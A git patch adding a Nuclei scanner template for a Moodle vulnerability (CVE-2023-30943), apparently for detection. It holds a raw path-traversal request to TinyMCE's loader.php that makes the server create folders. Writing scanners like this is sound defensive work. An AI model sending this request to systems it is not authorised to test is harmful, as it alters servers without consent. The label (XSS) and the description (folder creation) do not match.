From 83bb3b47664a673d7639325e4fa138c77d67b38c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 31 Aug 2023 10:04:29 +0530 Subject: [PATCH] Create CVE-2023-30943.yaml --- http/cves/2023/CVE-2023-30943.yaml | 45 ++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 http/cves/2023/CVE-2023-30943.yaml diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml new file mode 100644 index 0000000000..897865c6d3 --- /dev/null +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -0,0 +1,45 @@ +id: CVE-2023-30943 + +info: + name: Moodle - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. + reference: + - https://www.sonarsource.com/blog/playing-dominos-with-moodles-security-1/?utm_source=twitter&utm_medium=social&utm_campaign=wordpress&utm_content=security&utm_term=mofu + - https://nvd.nist.gov/vuln/detail/CVE-2023-30943 + metadata: + max-request: 2 + tags: cve,cve2023,moodle,xss + +http: + - raw: + - | + GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/.png HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + - | + GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "moodle" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200